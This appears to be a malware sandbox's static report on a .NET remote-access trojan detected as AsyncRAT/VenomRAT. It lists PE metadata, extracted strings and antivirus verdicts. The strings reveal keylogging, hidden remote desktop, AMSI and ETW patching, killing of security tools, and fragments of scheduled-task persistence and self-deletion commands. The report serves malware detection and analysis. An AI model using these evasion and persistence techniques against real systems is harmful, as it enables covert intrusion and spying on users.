Static | ZeroBOX

PE Compile Time

2023-02-09 07:10:28

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x00011454    0x00011600        5.82365863199
.rsrc   0x00014000       0x00000df7    0x00000e00        5.11403772122
.reloc  0x00016000       0x0000000c    0x00000200        0.101910425663

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x000140a0  0x000002d4  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x00014374  0x00000a83  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
v4.0.30319
#Strings
Action`10
InvalidParameter10
D84F4C120005F1837DC65C04181F3DA9466B123FC369C359A301BABC12061570
<>9__0_0
<Main>b__0_0
<>9__3_0
<Run>b__3_0
<>c__DisplayClass5_0
<>c__DisplayClass6_0
<PatchMem>b__0
<GetFiltes>b__0
<>p__0
AbandonedWait0
InvalidParameter11
<>p__1
IEnumerable`1
CallSite`1
List`1
InvalidParameter1
AbandonedWait1
InvalidParameter12
PROCESSENTRY32
Microsoft.Win32
ToUInt32
ReadInt32
ToInt32
SwapInt32
Func`2
X509Certificate2
InvalidParameter2
AbandonedWait2
<>o__53
AbandonedWait63
Func`3
InvalidParameter3
AbandonedWait3
E123F60E9FC6E974D1381F2F15FB19E7960628CC8925D65E344C2F2BDC64F424
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
Action`4
InvalidParameter4
__StaticArrayInitTypeSize=5
CABAFE20CFEA6C92D3377C14650461E190857D48D13934B5562233C314AAFBB5
InvalidParameter5
InvalidImageWin16
ToUInt16
ReadInt16
ToInt16
SwapInt16
HMACSHA256
Aes256
aes256
__StaticArrayInitTypeSize=6
InvalidParameter6
InvalidParameter7
get_UTF8
InvalidParameter8
InvalidParameter9
<Module>
MessagePackLib.<PrivateImplementationDetails>
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
StopHVNC
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
GetTypeFromCLSID
th32ModuleID
_hookID
th32DefaultHeapID
th32ProcessID
th32ParentProcessID
get_FormatID
HVNC_REPLY_MESSAGE
EXECUTION_STATE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
get_ASCII
WHKEYBOARDLL
GetRAM
WM_KEYDOWN
LASTINPUTINFO
System.IO
HVNC_REPLY_BMP
IsServerOS
ES_CONTINUOUS
NTSTATUS
GetGPU
get_IV
set_IV
GenerateIV
PatchETW
value__
Camera
havecamera
NotMappedData
ReadServertData
PropertyData
NoTxfMetadata
PagefileQuota
mscorlib
ProcessInJob
ProcessNotInJob
DifferenceAtDc
BadInitialPc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
LowLevelKeyboardProc
KernelApc
UserApc
dwThreadId
GetWindowThreadProcessId
lpdwProcessId
processId
GetProcessById
ObjectPathSyntaxBad
EndRead
BeginRead
idThread
BlockThread
InnerAdd
RecoveryNotNeeded
PagefileQuotaExceeded
ArrayBoundsExceeded
SemaphoreLimitExceeded
SuspendCountExceeded
ThreadWasSuspended
SectionNotExtended
b64encoded
SHA256Managed
AccessDenied
RangeNotLocked
get_Enabled
set_Enabled
get_isEnabled
set_isEnabled
ServerDisabled
AccountDisabled
ServerNotDisabled
TimerNotCanceled
RequestCanceled
IoPrivilegeFailed
LogGrowthFailed
TransactionPropagationFailed
TmInitializationFailed
PrimaryTransportConnectFailed
Cancelled
FileRenamed
NotAllAssigned
TransactionNotJoined
Abandoned
ProcessCloned
MutantNotOwned
NoneMapped
SomeNotMapped
ProfilingNotStopped
RegistryRecovered
PasswordExpired
RollbackTimerExpired
FormsAuthRequired
SynchronizationRequired
CheckOutRequired
FileForcedClosed
FileClosed
HandlesClosed
PortClosed
PortConnectionRefused
VirusInfected
get_Connected
PipeConnected
get_IsConnected
set_IsConnected
PipeDisconnected
RmDisconnected
LpcReceiveBufferExpected
LogCorruptionDetected
ProcessIsProtected
FileDeleted
VirusDeleted
LockNotGranted
NotImplemented
VolumeMounted
ProfilingNotStarted
RmAlreadyStarted
Alerted
TransactionAlreadyAborted
CtlFileNotSupported
EasNotSupported
TooManyGuidsRequested
TooManyLuidsRequested
TransactionNotRequested
GuidsExhausted
LuidsExhausted
AgentsExhausted
RxActCommitted
NotCommitted
TransactionAlreadyCommitted
Received
TransactionalOpenNotAllowed
LpcRequestsNotAllowed
InvalidCid
InvalidSid
HandleNoLongerValid
StreamMiniversionNotValid
CurrentTransactionNotValid
TransactionRequestNotValid
FileInvalid
ObjectNameInvalid
ObjectPathInvalid
get_Guid
PrivilegeNotHeld
<SendSync>k__BackingField
<Enabled>k__BackingField
<isEnabled>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<ActivatePo_ng>k__BackingField
<Ping>k__BackingField
<Interval>k__BackingField
<interval>k__BackingField
<Buffer>k__BackingField
<filter>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
FloatDenormalOperand
Append
RegistryValueKind
ResourceDataNotFound
ResourceNameNotFound
ObjectNameNotFound
ResourceTypeNotFound
ProcedureNotFound
ObjectPathNotFound
OrdinalNotFound
DllNotFound
CrmProtocolNotFound
StreamMiniversionNotFound
EntryPointNotFound
method
IllFormedPassword
WrongPassword
Replace
IsNullOrWhiteSpace
get_StackTrace
NotSameDevice
NoSuchDevice
NoMediaInDevice
CreateInstance
get_Source
source
vkCode
wScanCode
exitCode
keyCode
set_Mode
InvalidReadMode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
decode
utf8Encode
DeleteSubKeyTree
PageFaultGuardPage
SectionNotImage
BindToStorage
LpcInvalidConnectionUsage
cntUsage
get_Message
InvalidMessage
NoSuchPrivilege
WorkingSetLimitRange
EaTooLarge
FileTooLarge
DynamicAPIInvoke
DynamicInvoke
EndInvoke
BeginInvoke
DynamicFunctionInvoke
InstanceNotAvailable
PipeNotAvailable
IEnumerable
IDisposable
ToDouble
SwapDouble
InvalidHandle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
dwProcessHandle
WaitHandle
bInheritHandle
InvalidPortHandle
get_MainWindowHandle
handle
WriteSingle
ToSingle
SetAsSingle
Install_File
szExeFile
EndOfFile
KeylogConfFile
PageFaultPagingFile
NoSuchFile
LoadFromFile
DecodeFromFile
NoEasOnFile
SaveToFile
SaveBytesToFile
TmVolatile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
PrevActiveWindowTitle
get_MainWindowTitle
wintitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
DLLName
GetCPUName
get_Name
InvalidEaName
get_FileName
set_FileName
OfflineSaveFileName
OnlineSaveFileName
GetTempFileName
GetFileName
fileName
get_ModuleName
lpModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
FunctionName
PropName
get_UserName
InvalidComputerName
lowerName
get_ProcessName
GetActiveProcessName
SetName
InvalidAccountName
ExportName
CheckHostName
GetProcessesByName
DateTime
get_LastWriteTime
ToUniversalTime
dwTime
WrongVolume
WriteLine
get_NewLine
Combine
LocalMachine
ManagementScope
ComInterfaceType
BadFileType
UriHostNameType
FunctionDelegateType
get_ValueType
valueType
OfType
MsgPackType
SecurityProtocolType
uMapType
GetType
SocketType
ClientType
FileShare
Compare
System.Core
DInvokeCore
DllMightBeInsecure
LogonFailure
Server_signa_ture
ResourceInUse
TokenAlreadyInUse
ModuleBase
ReadOnlyCollectionBase
pcPriClassBase
ImageNotAtBase
Dispose
Reparse
DataLate
Certifi_cate
X509Certificate
Server_Certificate
certificate
Create
MulticastDelegate
NothingToTerminate
GetKeyboardState
InvalidPipeState
SetThreadExecutionState
lpKeyState
GetKeyState
CannotDelete
CallSite
PageFaultCopyOnWrite
TransactedMappingUnsupportedRemote
TransactionsUnsupportedRemote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
UnmanagedFunctionPointerAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
get_Value
DeleteValue
innerValue
GetValue
SetValue
set_Expect100Continue
get_KeepAlive
set_KeepAlive
RmNotActive
TransactionNotActive
DebuggerInactive
Remove
Client.exe
get_Size
cbSize
LogResizeInvalidSize
set_BlockSize
get_TotalSize
RegionSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
dwSize
set_KeySize
SizeOf
IndexOf
cchBuff
pwszBuff
CantTerminateSelf
IID_IPropertyBag
strFlag
SectionTooBig
CryptoConfig
get_ActivatePo_ng
set_ActivatePo_ng
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
DeletePending
UTF8Encoding
System.Drawing.Imaging
Ceiling
PipeListening
System.Runtime.Versioning
Warning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
KeylogMutexString
Substring
PipeClosing
ThreadIsTerminating
ProcessIsTerminating
ClearSetting
System.Drawing
SendLog
CouldNotResizeLog
ErrorLog
set_ErrorDialog
ObjectTypeMismatch
InfoLengthMismatch
RevisionMismatch
RemoteFileVersionMismatch
x64_am_si_patch
x86_am_si_patch
x64_etw_patch
x86_etw_patch
RecursiveDispatch
ComputeHash
ComputeStringHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
EndsWith
StartsWith
Patcham_si
PtrToStringAnsi
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
HookCallback
RemoteCertificateValidationCallback
TimerCallback
callback
unpack_msgpack
BadStack
BadInitialStack
FloatStackCheck
RegistryKeyPermissionCheck
FlushFinalBlock
StopBlock
StartBlock
idHook
SetHook
strVal
RtlSetProcessIsCritical
ProcessCritical
Marshal
NetworkCredential
Normal
Informational
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
get_interval
set_interval
InvalidAcl
BadInheritanceAcl
InvalidVolumeLabel
System.ComponentModel
ImpersonationLevel
BufferTooSmall
In_stall
Client.Install
kernel32.dll
user32.dll
ntdll.dll
DiskFull
WriteNull
SetAsNull
set_SecurityProtocol
MutexControl
Unsuccessful
DirectoryNotRm
UnableToFreeVm
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
keylogparam
Program
PatchMem
get_Item
get_Is64BitOperatingSystem
Client.Algorithm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
CLSID_SystemDeviceEnum
MsgPackEnum
ICreateDevEnum
WriteBoolean
ToBoolean
GetAsBoolean
SetAsBoolean
HwidGen
NoImpersonationToken
NoToken
CantRecoverWithHandleOpen
children
TransactionsNotFrozen
X509Chain
AppDomain
get_CurrentDomain
Paste_bin
IsAdmin
LastAdmin
Ver_sion
ObjectNameCollision
UnknownRevision
GetFileNameWithoutExtension
get_OSVersion
NoSuchLogonSession
System.IO.Compression
Application
System.Security.Authentication
GuardPageViolation
SharingViolation
AccessViolation
set_Impersonation
FloatInvalidOperation
InvalidWorkstation
MiniversionInaccessibleFromSpecifiedTransaction
InvalidTransaction
EfsNotAllowedInTransaction
CannotExecuteFileInTransaction
UnableToDeleteSection
System.Reflection
PropertyDataCollection
ProcessModuleCollection
X509CertificateCollection
ManagementObjectCollection
Client.Connection
InvalidPageProtection
SectionProtection
PasswordRestriction
AccountRestriction
IllegalFunction
function
PrivilegedInstruction
IllegalInstruction
PageFaultTransition
set_Position
position
CallingConvention
TransactionRequiredPromotion
CryptographicException
DllNotFoundException
MissingMethodException
NonContinuableException
ArgumentNullException
InvalidOperationException
get_InnerException
ManagementException
ArgumentException
StringComparison
DataOverrun
Unknown
CGRInfo
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
DirectoryInfo
PageFaultDemandZero
MappedFileSizeZero
IntegerDivideByZero
FloatDivideByZero
IncompatibleFileMap
WriteMap
PreventSleep
SingleStep
CrashDump
LongJump
currentApp
Microsoft.CSharp
NotifyCleanup
NoSuchGroup
SpecialGroup
MemberInGroup
MemberNotInGroup
InvalidPrimaryGroup
MembersPrimaryGroup
NormalStartup
System.Linq
InvalidSecurityDescr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Install_Folder
SpecialFolder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
get_Buffer
set_Buffer
TransactionInvalidMarshallBuffer
ServicePointManager
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
Logger
Keylogger
ManagementObjectSearcher
IMoniker
IEnumMoniker
ppEnumMoniker
moniker
SessionEndingEventHandler
InvalidOwner
Client.Helper
isVM_by_wim_temper
ToUpper
NoSuchUser
SpecialUser
CurrentUser
InvalidParameter
StreamWriter
TextWriter
get_filter
set_filter
GetDelegateForFunctionPointer
BitConverter
ValidateVenomServer
LogonServer
ToLower
NotifyEnumDir
EnlistmentNotSuperior
DataError
CrcError
InPageError
InternalError
EaCorruptError
IEnumerator
CreateClassEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
cntThreads
TooManyThreads
NativeMethods
Microsoft.VisualBasic.Devices
FindDevices
System.Runtime.InteropServices
System.Runtime.CompilerServices
InsufficientResources
DebuggingModes
set_EnablePrivileges
Matches
NoMoreEntries
get_Properties
ExpandEnvironmentVariables
TooManyOpenedFiles
NoMoreFiles
TooManyPagingFiles
get_Modules
GetSubKeyNames
System.Runtime.InteropServices.ComTypes
PacketTypes
GetProcesses
ConflictingAddresses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Delegates
GetFiltes
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
dwFlags
InitializeSettings
SessionEndingEventArgs
Anti_Analysis
RunAntiAnalysis
ICredentials
set_Credentials
Equals
SslProtocols
ReadTools
WriteTools
BytesTools
KeylogParams
System.Windows.Forms
Contains
CantCreateMoreStreamMiniversions
GetInstalledApplications
System.Collections
ConnectionOptions
StringSplitOptions
get_Chars
RemoveLastChars
FileLockedWithOnlyReaders
GetImageDecoders
EnumMonikers
RuntimeHelpers
Parameters
FileLockedWithWriters
get_filters
NoLogonServers
SslPolicyErrors
sslPolicyErrors
InvalidLogonHours
InvalidInfoClass
CallbackBypass
dwDesiredAccess
FileAccess
Success
Anti_Process
TerminateProcess
AntiProcess
KillProcess
ThreadNotInProcess
OpenProcess
GetCurrentProcess
IPAddress
InvalidAddress
GetLoadedModuleAddress
get_BaseAddress
GetExportAddress
GetLibraryAddress
OpLockBreakInProgress
Compress
Decompress
Por_ts
Hos_ts
System.Net.Sockets
set_Arguments
SystemEvents
ObjectNameExists
GroupExists
ObjectNoLongerExists
UserExists
TransactionSuperiorExists
CrmProtocolAlreadyExists
Antivirus
MaximumNtStatus
Concat
InvalidImageLeFormat
InvalidImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ReparseObject
ForcePathObject
ReleaseComObject
ManagementObject
object
Collect
Connect
Reconnect
OldProtect
InvalidImageProtect
NewProtect
FileLockConflict
TransactionalConflict
System.Net
TransactionScopeCallbacksNotSet
PortNotSet
PortAlreadySet
Target
target
KeepAlivePacket
ClientSocket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
CantWait
op_Explicit
set_DefaultConnectionLimit
BadWorkingSetLimit
CommitmentLimit
ControlCExit
ClientOnExit
WaitForExit
get_Default
FirstOrDefault
IAsyncResult
FloatInexactResult
result
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
DatatypeMisalignment
Environment
Component
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
TxfMetadataAlreadyPresent
CantOpenMiniversionWithModifyIntent
get_content
set_content
EaListInconsistent
FileIdentityNotPersistent
get_RemoteEndPoint
Breakpoint
get_Count
get_ProcessorCount
SpecialAccount
NoQuotasForAccount
amount
CreateToolhelp32Snapshot
hSnapshot
GetPathRoot
RmMetadataCorrupt
TxfAttributeCorrupt
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
InvalidDeviceRequest
ToList
GetUserProcessList
IndoubtTransactionsExist
MessageLost
Process32First
FileCheckedOut
IoTimeout
GetKeyboardLayout
Process32Next
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
AppendAllText
GetWindowText
NotMappedView
get_Now
GetForegroundWindow
set_CreateNoWindow
FilterProcessWindow
FloatUnderflow
BufferOverflow
IntegerOverflow
FloatOverflow
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
CloseMutex
CreateMutex
InvalidParameterMix
IBindCtx
De_lay
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
CantBreakTransactionalDependency
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
MapVirtualKey
masterKey
wVirtKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
PartialCopy
CantCrossRmBoundary
WriteBinary
ToBinary
library
ObjectQuery
SelectQuery
CLSID_VideoInputDeviceCategory
category
NtProtectVirtualMemory
NoMemory
CantDisableMandatory
CreateDirectory
get_SystemDirectory
NonExistentEaEntry
SetRegistry
InitRegistry
DeviceBusy
PipeBusy
op_Equality
op_Inequality
InvalidSubAuthority
InvalidIdAuthority
System.Net.Security
WindowsIdentity
PipeEmpty
IsNullOrEmpty
TxfDirNotEmpty
VolumeDirty
InvalidImageNotMz
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
ControlThread
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$29840822-5B84-11D0-BD3B-00A0C911CE86
$55272A00-42CB-11CE-8135-00AA004BB851
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.7.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
MyData
DataLogs.conf
DataLogs_keylog_offline.txt
DataLogs_keylog_online.txt
Select * from Win32_Processor
{0} ({1} Core)
NumberOfCores
Select * From Win32_ComputerSystem
TotalPhysicalMemory
select * from Win32_VideoController
{0} v{1}
DriverVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
UninstallString
InstallLocation
msiexec.exe
Pac_ket
keyLogger
[Enter]
----- [
MM-dd HH:mm:ss
cvtres
C://Temp//1.log
SHA256
%AppData%
Message
init_reg
loadofflinelog
plu_gin
save_Plugin
HVNCStop
keylogsetting
runningapp
filterinfo
OfflineKeylog sending....
offlinelog
sendPlugin
Hashes
running
Plugin.Plugin
Msgpack
UmVjZWl2ZWQ=
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
@echo off
timeout 3 > NUL
START "" "
" /f /q
Install Failed :
Taskmgr.exe
ProcessHacker.exe
procexp.exe
MSASCui.exe
MsMpEng.exe
MpUXSrv.exe
MpCmdRun.exe
NisSrv.exe
ConfigSecurityPolicy.exe
MSConfig.exe
Regedit.exe
UserAccountControlSettings.exe
taskkill.exe
\\{0}\root\CIMV2
SELECT * FROM Win32_OperatingSystem
ProductType
Select * from Win32_CacheMemory
{860BB310-5D01-11d0-BD3B-00A0C911CE86}
{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
{55272A00-42CB-11CE-8135-00AA004BB851}
FriendlyName
Err HWID
ClientInfo
ClientType
Normal
DesktopName
Microsoft
Camera
Version
Perfor_mance
Paste_bin
Anti_virus
Install_ed
C:\Temp\client.log
C:\Temp\client_ex.log
: ex
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Unknown
Environment
windir
Software
Classes
mscfile
ms-settings
, Dll was not found or not loaded.
Failed to parse module exports.
, export not found.
Could not get the handle for the function.
ntdll.dll
NtProtectVirtualMemory
not found.
[!] {0}
YW1zaS5kbGw=
AmsiScanBuffer
EtwEventWrite
Software\
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
VenomRATByVenom
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
OfflineKeylogger
Normal
HVNC_REPLY_MESSAGE
HVNC_REPLY_CMP
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
InternalName
ClientAny.exe
LegalCopyright
LegalTrademarks
OriginalFilename
ClientAny.exe
ProductName
ProductVersion
Assembly Version
6.0.1.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.AsyncRAT.4!c
tehtris Clean
ClamAV Win.Packed.Razy-9807129-0
CMC Clean
CAT-QuickHeal Trojan.GenericFC.S30117478
Skyhigh BehavesLike.Win32.Generic.lm
ALYac Trojan.GenericKDZ.102657
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 700000121 )
Alibaba Trojan:MSIL/AsyncRAT.497aed9d
K7GW Trojan ( 700000121 )
Cybereason malicious.db0bd6
huorong Backdoor/MSIL.DcRat.a
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.B
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of MSIL/AsyncRAT.A
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.MSIL.Agent.gen
BitDefender Trojan.GenericKDZ.102657
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Agent.75776.CHZ
MicroWorld-eScan Trojan.GenericKDZ.102657
Tencent Trojan.MSIL.Agent.16000593
TACHYON Clean
Sophos Troj/VenomRat-A
F-Secure Heuristic.HEUR/AGEN.1371145
DrWeb BackDoor.AsyncRATNET.1
VIPRE Trojan.GenericKDZ.102657
TrendMicro Backdoor.MSIL.ASYNCRAT.SMYXDHV
McAfeeD Real Protect-LS!EFF57BBDB0BD
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.eff57bbdb0bd6825
Emsisoft Trojan.GenericKDZ.102657 (B)
Ikarus Backdoor.Agent
GData MSIL.Trojan-Stealer.Keylogger.BA
Jiangmin Trojan.MSIL.aoink
Webroot W32.Trojan.Gen
Varist W32/Trojan.IML.gen!Eldorado
Avira HEUR/AGEN.1371145
Antiy-AVL Trojan[Backdoor]/MSIL.AsyncRAT
Kingsoft Clean
Gridinsoft Trojan.Win32.AsyncRAT.dd!n
Xcitium Clean
Arcabit Trojan.Generic.D19101
SUPERAntiSpyware Trojan.Agent/Gen-MSILZilla
ZoneAlarm HEUR:Trojan.MSIL.Agent.gen
Microsoft Trojan:MSIL/AsyncRAT.S!MTB
Google Detected
AhnLab-V3 Trojan/Win.AsyncRAT.R609293
Acronis Clean
McAfee GenericRXVS-NQ!EFF57BBDB0BD
MAX malware (ai score=80)
VBA32 TScope.Trojan.MSIL
Malwarebytes Generic.Trojan.MSIL.DDS
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Backdoor.AsyncRAT!1.C678 (CLASSIC)
Yandex Trojan.Agent!Yb6QvoCYMVA
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.8703358.susgen
Fortinet MSIL/Agent.CTE!tr
BitDefenderTheta Gen:NN.ZemsilF.36810.em0@aq!ebCm
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Rat:Win/AsyncRAT.Stub
No IRMA results available.